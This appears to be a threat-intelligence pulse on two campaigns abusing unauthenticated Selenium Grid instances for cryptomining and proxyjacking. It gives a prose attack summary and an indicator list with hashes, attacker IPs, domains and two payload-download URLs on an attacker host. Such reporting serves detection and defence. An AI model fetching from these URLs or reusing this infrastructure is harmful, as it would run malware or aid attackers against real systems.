Back

From Automation to Exploitation: The Growing Misuse of Selenium Grid for Cryptomining and Proxyjacking

Sept. 17, 2024, 11:28 a.m.

Tags

cryptomining
vulnerability exploitation
2024-09-17
tor
proxyjacking
perfcc
iproyal pawns
gsocket
traffmonetizer
selenium grid

External References

https://www.cadosecurity.com/

https://otx.alienvault.com/

Description

Two campaigns targeting Selenium Grid, a popular web testing tool, have been identified. The attacks exploit misconfigured instances lacking authentication to deploy cryptominers and proxyjacking tools. The first campaign injects a base64 encoded Python script to download and execute a reverse shell, followed by scripts that install IPRoyal Pawns for proxyjacking and TraffMonetizer for traffic monetization. The second campaign similarly injects a script that downloads and executes an ELF binary. This binary attempts privilege escalation, connects to Tor nodes for C2, and drops the 'perfcc' cryptominer. Both campaigns highlight the risks of misconfigured Selenium Grid instances and the need for proper authentication.

Date

Published Created Modified
Sept. 17, 2024, 11:14 a.m. Sept. 17, 2024, 11:14 a.m. Sept. 17, 2024, 11:28 a.m.

Indicators

96969a8a68dadb82dd3312eee666223663ccb1c1f6d776392078e9d7237c45f2

95aa55faacc54532fdf4421d0c29ab62e082a60896d9fddc9821162c16811144

44e83f84a5d5219e2f7c3cf1e4f02489cae81361227f46946abe4b8d8245b879

31ee4c9984f3c21a8144ce88980254722fd16a0724afb16408e1b6940fd599da

22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13

50.7.74.173

212.47.244.38

193.168.143.199

173.212.220.247

95.216.88.55

154.213.187.153

www.xt3tiue7xxeahd5lbz.com

www.os7mj54hx4pwvwobohhh6.com

www.kdzdpvltoaqw.com

www.fkxwama7ebnluzontqx2lq.com

http://173.212.220.247/burjdubai/.jblae/y

http://173.212.220.247/burjdubai/.jblae/pl

funnyralph69@proton.me

Attack Patterns

GSocket

perfcc

T1574.006

T1053.003

T1568.002

T1070.003

T1059.006

T1027.002

T1059.004

T1070.004

T1005

T1496

T1140

CVE-2021-4043